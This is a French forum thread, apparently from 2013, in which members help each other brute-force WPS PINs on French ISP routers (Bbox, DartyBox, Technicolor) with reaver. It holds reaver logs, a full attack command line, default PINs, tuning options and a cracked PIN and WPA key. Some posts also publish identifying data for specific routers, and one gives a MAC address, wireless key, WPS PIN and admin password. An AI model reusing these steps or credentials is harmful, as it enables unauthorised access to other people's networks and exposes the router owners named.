Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 17-02-2013 10:46:15

tchoul
Nouveau membre
Inscription : 16-02-2013
Messages : 9

Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

Bonjour à tous!

Je tente de récupérer la clé WPA d'une Bbox par le WPS avec reaver-1.4, je suis arrivé à 90,90% en environs 30 heures et depuis il essaye le même PIN en boucle.
Il me marque un truc dans le genre :

[+] Trying pin 99985677
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 90,90% complete @ 2013-02-17 10:10:18 (122 seconds/pin)
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Trying pin 99985677
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred

Le truc c'est qu'il me l'a déjà fait avant les 90,90% est au bout d'un moment il est reparti en essayant d'autre pin mais là pas moyen!

Moi je pense à une perte du signal ou signal trop faible qui était entre -80 et -90 RSSI ou un blocage de la Bbox après X tentative

Si vous avez déjà palier à ce problème faites moi signe

Cordialement tchoul

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-02-2013 11:57:18

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

Salut wink


Tu as essayé avec une version 1.3 pour voir si tu avais le même message d'erreur ?


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#3 17-02-2013 12:04:44

tchoul
Nouveau membre
Inscription : 16-02-2013
Messages : 9

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

Tu crois que ça peut changer quelque chose? hmm

Hors Ligne

#4 17-02-2013 15:30:46

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

Le moteur de recherche ne mord pas wink
reaver s'arrete à 99.99
Tu vas me dire que toi tu es à 90,9 % mais c'est exactement le même sujet wink
regarde le topic que je te mets en lien, regarde bien le schéma du protocole WPS, tu verras que si tu as la première moitié du PIN (et donc 90% de l'attaque effectuée tu devrais recevoir et envoyer des M5-M6 et M7.
Là tu n'en envoie pas donc tu n'es pas à 90% de l'attaque, tu es en train de ne rien faire. hmm
Des fois ça rentre après quelques ratés comme dans ce cas ou je mets le pin par defaut (tu regardes quel est ton PIN et tu ajoutes l'option -p XXXXXXXXX)

[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Nothing done, nothing to save.
[+] 90.91% complete @ 2013-02-08 18:43:39 (0 seconds/pin)
[+] Trying pin 94391640
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 55 seconds
[+] WPS PIN: '94391640'
[+] WPA PSK: '36590697C'
[+] AP SSID: 'vodafoneXXXX'
[+] Nothing done, nothing to save.

Tu peux voir "90.91% complete @ 2013-02-08 18:43:39 (0 seconds/pin)"
le 90,91% devrait être 90% car comme tu peux voir je n'ai envoyé aucun PIN (o/secondes)
Tout ça pour dire que si tu vois ton attaque partir en flèche au dessus des 90% mais en lançant le même PIN et sans voir en console M5 et M6, c'est mal barré

+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

Ça aussi ce n'est pas bon...

tu peux augmenter le temps pour les time out

-t, --timeout=<seconds>         Set the receive timeout period [5]
	-T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]

Hors Ligne

#5 17-02-2013 16:06:15

tchoul
Nouveau membre
Inscription : 16-02-2013
Messages : 9

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

J'ai résussi sur une DartyBox en 25 sec big_smile grace au PIN par default bien sur!
Pour info :
Ubuntu12.10 reaver 1.4
Sur DartyBox   Vendor 001D19     Arcadyan Technology Corporation
WPA2 CCMP PSK
PIN 12345670 :-D

Hors Ligne

#6 17-02-2013 16:09:31

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

excellent! smile
Pourrais tu me donner les trois prmiers paires de l'adresse mac et ainsi je rajoutte le PIN a WPSPIN
Pourrais tu préciser si le WPS est activé par défaut?
As tu ajoutté du delay ou tu as lancé l'attaque sans ajouuter d'options?
Excellent smile

Hors Ligne

#7 17-02-2013 16:15:40

tchoul
Nouveau membre
Inscription : 16-02-2013
Messages : 9

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

Les trois 1ère paire sont comme préciser plus haut ^^ 00:1D:19
Par contre je ne sais pas si il est par default... mais vu que le PIN est 12345670 je suppose que oui ^^

La commande utilisé : reaver -i mon0 -b 00:1D:19:XX:XX:XX -a -L -vv -c 6

Hors Ligne

#8 17-02-2013 16:28:47

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

12345670 c'est en effet le PIN par défaut, c'est celui qui est attribué automatiquement si le routeur n'en attribue pas un autre.
Si tu n'as pas effectué de modifications dans la page de configuration de ta box c'est celui par défaut.
en effet j'ai les trois premières paires tongue
c'est l'émotion lol
Merci dans tous les cas

Hors Ligne

#9 17-02-2013 16:34:13

tchoul
Nouveau membre
Inscription : 16-02-2013
Messages : 9

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

Non je n'ai pas effectué de modifications dans la page de configuration la box
Et merci à vous! Ceux qui partage leur savoir, tout les tuto et manips ^^

Je ne suis qu'un simple testeur ^^

Dernière modification par tchoul (17-02-2013 16:44:56)

Hors Ligne

#10 17-02-2013 16:39:46

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

tchoul a écrit :

J'ai résussi sur une DartyBox en 25 sec big_smile grace au PIN par default bien sur!
Pour info :
Ubuntu12.10 reaver 1.4
Sur DartyBox   Vendor 001D19     Arcadyan Technology Corporation
WPA2 CCMP PSK
PIN 12345670 :-D


Je confirme les dartybox sont ultra vulnerables...


J'ai fais le test sur le reseau d'un ami et je m'en suis apercu (d'ailleurs attention, deux ESSID differents selon le cryptage)

Le premier en WEP est 06:19:D2 (DartyBox_F52B_WEP) (difficile à craquer sans client car la box envoit des paquets en continue même sans client)

Et pour le WPA et/ou WPA2 c'est 00:19:D2 (DartyBox_F52B) (TRES vulnerable en WPS)


Concernant les MAC Adress :

Je trouve avec les deux premières paires 00:1D:6A, une Livebox donc attention la troisieme paire doit être descisive wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#11 17-02-2013 16:41:20

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

Merci pour l'info furyo wink
Très bien je vais rajouter ça au script, la darty box 2 de arcadyan technologies cool

Hors Ligne

#12 17-02-2013 16:58:44

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

kcdtv a écrit :

Merci pour l'info furyo wink
Très bien je vais rajouter ça au script, la darty box 2 de arcadyan technologies cool


De rien, Kcdtv wink


Je t'envoie un mail pour les vrais infos car je voulais pas diffusé "en clair" ce genre d'info wink

Dernière modification par Furyo (17-02-2013 16:58:59)


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#13 17-02-2013 17:22:00

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

Merci beaucoup,
Tu as tout à fait raison.... wink
Merci d'avance smile
J'ai bien reçu les infos et je t'ai envoyé un mail smile

Hors Ligne

#14 17-02-2013 17:38:19

tchoul
Nouveau membre
Inscription : 16-02-2013
Messages : 9

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

Bon je suis entrain de tester sur une Bbox,  il test 12345670 normal et continue sur d'autre PIN  puis j'ai mis le BSSID et ESSID dans PINwpsGUI il m' a sorti 3 PIN 49760798 + 2 autres 49760873 et 49760934
J'ai essayé le 1 er m'a fait monter directement a 90,94% !
Et la je bloque encore

info
ESSID = Bbox-548C9D
BSSID = 00:1F:9F:XX:XX:XX

Hors Ligne

#15 17-02-2013 18:31:46

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

kcdtv a écrit :

Merci beaucoup,
Tu as tout à fait raison.... wink
Merci d'avance smile
J'ai bien reçu les infos et je t'ai envoyé un mail smile


Bien recu et répondu avec certitude wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#16 03-03-2013 16:24:34

tchoul
Nouveau membre
Inscription : 16-02-2013
Messages : 9

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

J'ai résussi sur une Bbox en 2 sec grace au PINwps'GUI :-D

Pour info :
Ubuntu12.10 reaver 1.4
essid : Bbox-D4DE23DC
bssid : C0:AC:54:1A:ED:D0

Hors Ligne

#17 04-03-2013 05:49:07

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

Tchoul, ça fait plusieurs fois que tu veux collaborer mais ça ne sert malheureusement à rien parce qu'il me faut des donnés complètes, avec trois captures d'écran de la page de configuration du routeur c'est suffisant wink

Essid
bssid
numéro de séries
version hardware
version firmware
PIN par défaut
Le WPS est-il activé par défaut?
Clef WPA par défaut

PINwps'GUI c'est pour windows et perso je n'ai pas intégré de ce pin dans wpspin, tu ne l'auras pas dans la version windows non plus vu que c'est la même maison. wink

Hors Ligne

#18 07-03-2013 13:34:28

nabbouti
Membre Hyperactif
Inscription : 30-08-2012
Messages : 60

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

tchoul ,kcdtv ,la nouvelle génération des routeurs implante une forte detection d'intrusion surtout face wps,moi en arrivant à 99%!!!sans avoir le PIN ....,etonnant!!!!
alors j'ai continué ma recherche j'ai devoilé que ce sont des routeurs Technicolor nouvelle firmware 2012
information:

MAC  00:18:E7:A5:49:53
WIRELESS KEY 22A9A2B3C0
PIN  wps : 74373413
admin : gzwv
dc :12V 1A
network name : TNCAPA54953
model router : TD5130
SN : 1211A1D10331

le probleme est que meme je teste -p 74373413 avec reaver ca donne rien,meme wps activé (wash -i ),ca resiste  kcdtv vous voyez!!!!!
en attendant un algo de votre part car la plupart des pin wps technocolors commence par 74xxxxxx

Hors Ligne

#19 07-03-2013 14:56:44

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bloqué à 90,90% Crack WPA par WPS avec reaver-1.4

en attendant un algo de votre part car la plupart des pin wps technocolors commence par 74xxxxxx

Merci pour les données, mais avant toutes choses il en faut plus pour pouvoir commencer à travailler (faux positifs)
Ensuite je n'ai aucune faculté particulière, ta confiance fait plaisir, mais çá ne marche pas comme ça wink
Essaye des trucs de ton côté, cherche, expérimente... provoque la chance wink
Commence par ouvrir un thème d'étude bien fait pour que nous puissions, collectivement, étudier ce cas.
Ce topic a une thématique précise, nous sortons de celle-ci wink

Je viens de voir que tu as fais un double post > http://www.crack-wifi.com/forum/topic-8 … -9999.html

Je l'efface et te rappelle que c'est particulièrement mal vu et passible de ban.

10/ Les double posts, la pollution de topic, le spam et le mail flooding

Nous tenons à insister sur le fait que tout double ou triple post est très mal vu sur le forum. Si vous avez créé une discussion qui n'a pas eu de réponse, inutile d'aller recréer une discussion strictement identique, c'est du double post. De la meme manière, le fait d'aller poster des messages identiques dans plusieurs discussions afin d'attirer l'attention sur vous est encore qualifiable de double post, voir de spam. En agissant ainsi, vous polluez des sujets, vous créez sur notre forum du contenu dupliqué et vous vous exposez à etre sanctionné voir banni. La publicité non sollicitée ou le fait de venir sur notre espace de discussion coller un message qui n'est pas en rapport avec la thématique que nous abordons et qui de plus sera une copie conforme de posts existant déja ailleurs sur le net tout cela dans le seul but de créer du trafic en direction d'un site web sera automatiquement considéré comme du spam, en venant spammer notre espace de discussion vous vous exposez à etre modéré, averti voir banni sans préavis. Les envois de Messages Privés via le système de messagerie automatisée du forum ne sont tolérés que lorsqu'ils ont été sollicités. En spammant les membres du forum via MP (mail flooding), en leur envoyant des messages non sollicités, pubs, spams et autres pourriels vous montrez clairement un manque de respect pour notre espace de discussion ainsi que ses membres, vous vous exposez ainsi à un bannissement pur et simple sans préavis. C'est un comportement avec lequel nous ne plaisantons pas car nous avons déja eu des soucis de ce genre par le passé. Si une personne vient chez nous dans le seul but d'envoyer du spam par MP pour un forum ou un site web, la sanction sera sans pitié. Le spammeur sera banni, et le nom du forum / site web sera blackilisté afin qu'il soit par la suite impossible de les afficher sur le forum, ce qui ne fera au final que nuire au site en question. Polluer la messagerie privée de nos membres est absolument stupide et inutile, et ceux qui s'y sont risqués n'y ont rien gagné à part des ennuis. Pour info, le dernier site en date qui a joué à ce jeu dangereux est aujourd'hui tout simplement fermé...

Je te prie de bien vouloir faire particulièrement attention à ne pas faire de double post wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.031 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]